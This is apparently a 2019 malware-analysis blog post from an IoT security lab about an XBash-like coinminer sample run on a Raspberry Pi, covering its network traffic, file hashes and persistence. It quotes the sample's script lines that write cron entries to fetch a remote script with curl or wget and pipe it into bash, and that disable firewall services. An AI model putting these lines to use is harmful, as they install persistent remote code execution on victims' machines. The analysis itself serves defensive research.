This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-05-19
The sample was executed in a RapsberryPi from our IoT laboratory and the capture ID is 41-1.
The SHA256 of the sample that we executed in our laboratory is: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4.
As specified by VirusTotal analysis, this malware could be a CoinMiner, however, the name is not defined. The file name for the sample is mr.sh.
According to the blogpost written by Oleg Kolesnikov and Harshvardhan Parashar from Securonix this sample is in a group of malicious scripts that maintain persistence by creating a cronjob entry. According to the blogpost, the possible name for the malware we executed is XBash.
Another blogpost that describes XBash behavior mentione:
Xbash has ransomware and coinmining capabilities
According to this blogpost by Palo Alto researchers, XBash targeted Linux and Windows systems. XBash is a botnet, coinminer, ransomware that has self-propagation capabilities. On Linux, this malware has ransomware and botnet capabilities. For Windows systems, coinmining and self-propagating capabilities
This malware contacted a remote server with IP address 22.214.171.124 on port 8220/TCP, and downloaded several files by using GNU Wget agent and curl. The domain registered to that IP is http://www.ovh.com. According to Virus Total analysis, some of the files referring to this IP are: mr.sh, 2mr.sh, 3mr.sh. The curl request looks like this:
GET /mr.sh HTTP/1.1 Host: 126.96.36.199:8220 User-Agent: curl/7.52.1 Accept: */*
The network behavior is repetitive; the infected device contacted the IP 188.8.131.52 on port 8220/TCP and downloaded in a span of 24 hours a total of 8646 files. The malware requests download the same files, named: mr.sh, 2mr.sh, 11, 1.so. The file names are the same, however, the files are different. For example, the file name 1.so was downloaded 4143 times. Two versions of the that were compared and turn out that there were different files and had different sha256 (see IoC section)
Some one the downloaded files are:
According to VirusTotal, the name for those samples is not exact. Some of them are considered as a type of coin Miner, others as rootkit.
Analysis of the malware code executed
In the sample executed in the RaspberryPi, it is possible to see that the malware is creating files and changes permissions. Then, it stop the services iptables and SUSEfirewall. Also, it kills the processes sysxlj, jourxlv, sustes. Regarding the name of the services and proceses, it is possible to observe that this malware is clearly aiming linux based devices, specially those running SuseOS.
The malware creates crontab to download files (this behavior matches the network behavior and the behavior analyzed on the blogpost). The portion of the script doing this operation is the following:
echo -e "*/1 * * * * root (curl -s http://184.108.40.206:8220/mr.sh||wget -q -O - http://220.127.116.11:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://18.104.22.168:8220/mr.sh||wget -q -O - http://22.214.171.124:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * * (curl -s http://126.96.36.199:8220/mr.sh||wget -q -O - http://188.8.131.52:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -s http://184.108.40.206:8220/mr.sh||wget -q -O - http://220.127.116.11:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 http://18.104.22.168:8220/11 -o /etc/cron.hourly/oanacroner1||http://22.214.171.124:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
File name: mr.sh
sha 256: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4
File name: 11
sha 256: 8955a8f071c5de865cfe2c0f58bc3dfb2d6054d037361e4eb56a6dc02780f4a0
File name: 2mr.sh
sha 256: ba74e757ff0a6d0d28f075bf6eef0feba6bb29da9e6e81afcdd12b8b49f69b88
File name: 1.so
sha 256: f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
File name 1.so:
sha 256: 90dff83ca6519cbdb490013273c1301f93614c983e2015f3224700ac1f028a8f
In the network capture, this malware doesn’t take anymore actions at a network level. It basically downloads the listed files several times.
This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.
Thanks to Veronica Valeros for her help in the analysis and writing corrections.